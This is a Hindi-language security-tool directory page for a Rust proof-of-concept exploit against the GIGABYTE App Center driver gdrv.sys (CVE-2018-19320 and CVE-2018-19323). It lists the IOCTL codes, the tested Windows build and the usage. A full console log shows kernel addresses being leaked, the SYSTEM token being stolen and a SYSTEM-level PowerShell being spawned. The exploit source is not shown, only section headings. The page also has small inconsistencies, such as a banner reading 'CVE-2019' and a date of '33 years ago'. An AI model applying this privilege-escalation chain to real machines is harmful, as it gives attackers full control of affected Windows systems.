Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-1932X — CVE-2018-1932X कर्नेल ड्राइवर भेद्यताओं के लिए Rust POC | Kitploit
उपकरण/GitHubGitHub/bkreisel/cve-2018-1932x
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

CVE-2018-1932X कर्नेल ड्राइवर भेद्यताओं के लिए Rust POC

रिपॉजिटरी देखें
33 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-1932X (रस्ट एक्सप्लॉइट POC) GIGABYTE APP Center v1.05.21 और उससे पहले के लिए

सिर्फ इसलिए कि आपका लक्ष्य मेमोरी असुरक्षित है, इसका मतलब यह नहीं है कि आपका एक्सप्लॉइट असुरक्षित होना चाहिए!

उपयोग की गई असुरक्षाएँ :

  • CVE-2018-19320 - ring0 memcpy-जैसी कार्यक्षमता
  • CVE-2018-19323 - मशीन विशिष्ट रजिस्टर (MSRs) को पढ़ें और लिखें।

परीक्षण किया गया:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

संदर्भ

  • Vergilius Project: Kernel Structs
  • Gigabyte Patch Announcement
  • _KPCR Details

आवश्यकताएँ

  • केवल x64
  • ऊपर दिए गए बिल्ड नंबरों पर परीक्षण किया गया
  • लोडेड GIGABYTE ड्राइवर: gdrv.sys

उपयोग

.\CVE-2018-1932X.exe

उदाहरण

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

Spawned Powershell:

root@kitploit:~
PS C:\> whoami
nt authority\system

असुरक्षित ब्लॉक

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR Manipulation (IOCTL 0x0C3502580)

MSR Code Blocks

टूल डाउनलोड करें